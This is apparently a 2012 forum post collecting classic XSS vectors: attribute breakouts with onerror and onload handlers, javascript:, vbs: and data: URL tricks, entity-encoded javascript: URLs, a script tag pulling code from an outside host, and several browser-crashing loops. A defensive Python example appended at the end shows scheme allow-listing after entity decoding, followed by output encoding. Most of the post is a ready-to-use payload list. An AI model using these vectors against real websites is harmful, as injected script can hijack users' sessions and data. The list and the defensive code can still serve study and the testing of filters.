彬能哥 posted on 2012-7-6 17:02:45

A collection of some classic XSS cross-site vectors

<!-- " --!><input value="><img src=xx:x onerror=alert(1)//">
<script/onload=alert(1)></script> IE9
<style/onload=alert(1)>
alert(-->1<!--)
1<!--i
document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8
JSON.parse('{"__proto__":["a",1]}')
location++
IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
alert('aaa\0bbb') IE only shows aaa http://jsbin.com/emekog
<svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera
Function('alert(arguments.callee.caller)')()
firefox dos? while(1)find();
<div/style=x:expression(alert(URL=1))>
Injecting <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enables CSS expressions, breaking standards mode!
<applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!
<math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector
<svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~
<body/onload=\\\vbs\\\::::::::alert+'x'++'o'+'x'+::::::::>
vbs:alert+-[]
<body/onload=vbs::::::::alert----+--+----1:::::::::>
Firefox vector <math><a xlink:href="//mmme.me">click
<svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>
Inj>> <script/src=//0.gg/xxxxx> << <script>...</script> less xss
Webkit X-XSS-Protection header is enabled just now :P
<svg/onload=domain=id> 22 letters e.g. http://fiddle.jshell.net./KG7fR/5/show/
<?xml encoding="><svg/onload=alert(1)// >">
<a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE
Also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a>
<h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only
<1h name="<svg/onload=alert(1)>"></1h>
<img ="1 src=xxx:x onerror=alert(1)//" > works in non-IE browsers
javascript=1;for(javascript in RuntimeObject());javascript=='javascript'
<body/onerror=alert(event)><img/src=javascript:throw> Firefox Sandbox object
<img src='javascript:while([{}]);'> works in firefox
for(x in document.open); Crash your IE 6:>
localStorage.setItem('setItem',1)
Only to find '?'.toUpperCase()==='?'.toUpperCase()
J? H? T? W? Y? i? length==2
'?'.toUpperCase()=='I'
Also '?'.toUpperCase()=='SS'
'?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST
#Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>
Firefox always the most cute data:_,<script>alert(1)</script>
<a href="ftp:/baidu.com">xx</a>
http://?????????? works in Firefox
RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?
location='&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'
for({} in {});
Interesting: http://jsbin.com/inekab for Opera only
<a href=https:http://www.google.com>x</a> That's a relative path?
document.frames==window.frames
<a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox
(0).constructor.constructor=function(){alert(eval(arguments.substr(6)))} Easy to decode jjencode and aaencode :D
127.0x000000001==127.0.0.1
<input value="&#31sefewfewf"/> Chrome input value block
<svg><xmp><img/onerror=alert(1) src=xxx:x />
<img src/="><img src=xxx:x onerror=alert(1)//">
Interesting isindex: <isindex formaction=javascript:alert(1) type=submit >
chrome:xx -> chrome://crash/ crash?
<form action=javascript:alert(1) /><input> Chrome input enter fucked!
<form/><button/><keygen/> chrome sends an empty key, is funny~_~
<form/><input/formaction=javascript:alert(1)> Because <form> is not a void element. <form><input/name="isindex"> when the name is isindex it does not send the key.
<form id=x ></form><button form=x formaction="javascript:alert(1)">X It's like http://html5sec.org/#1 but only Chrome supports it.
<script language="php">echo 1 ?> Fascinating.
fvck:for(_?in?this)_['match'](/.Element$/)&&console.log(_)
location.reload('javascript:alert(1)') //ie only,lol~
{}alert(1)
Twitter @jackmasa =P
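Many of the vectors above fall into two families: attribute breakouts such as "><img src=xx:x onerror=alert(1)// and URL-scheme tricks such as javascript:, jar:, data: and the entity-encoded &#106&#97...&#41 form of javascript:. The following is an added defensive example, not code from the post or its author; it shows the two checks a server-side renderer needs against exactly these families: decoding entities and control characters before scheme allow-listing, then context-specific output encoding. ALLOWED_SCHEMES, render_link and the sample inputs are assumptions made for the example.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes an href/src/formaction attribute is allowed to carry (assumed policy); all others refused.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers drop leading/trailing C0 controls and spaces, and embedded tab/CR/LF, before they
# recognise a scheme, so the check must drop them too (otherwise "java\tscript:" slips through).
_EDGE_CTRL = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_INNER_CTRL = re.compile(r"[\t\n\r]")


def normalize_url(raw: str) -> str:
    """Undo the decoding layers a browser applies to an attribute value before resolving it."""
    decoded = html.unescape(raw)  # numeric/named entities, with or without the trailing ';'
    decoded = _EDGE_CTRL.sub("", decoded)
    return _INNER_CTRL.sub("", decoded)


def is_safe_href(raw: str) -> bool:
    """True for relative URLs and allow-listed schemes; False for javascript:, data:, jar:, vbs:, ..."""
    try:
        scheme = urlsplit(normalize_url(raw)).scheme.lower()
    except ValueError:  # malformed input (e.g. broken IPv6 brackets) is refused, not guessed at
        return False
    return scheme == "" or scheme in ALLOWED_SCHEMES


def render_link(href: str, text: str) -> str:
    """Emit an <a> tag from untrusted data: scheme check first, then context-specific encoding.

    The attribute value is encoded with quotes, so a breakout like '"><img ... onerror=...'
    stays inside the quoted attribute; the text node only needs & < > encoded.
    """
    safe_href = href if is_safe_href(href) else "#"
    return '<a href="%s">%s</a>' % (html.escape(safe_href, quote=True), html.escape(text, quote=False))


if __name__ == "__main__":
    # Constructed inputs modelled on vectors from the post above.
    samples = [
        "javascript:alert(1)",
        "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41",
        "jar:xxx",
        "https://example.com/",
        '"><img src=xx:x onerror=alert(1)//',
    ]
    for sample in samples:
        print(repr(sample), "->", render_link(sample, "x"))
```

Note that the scheme check alone is not enough: the last sample passes it (it has no scheme) and is neutralised only by the attribute encoding, which is why both steps are kept.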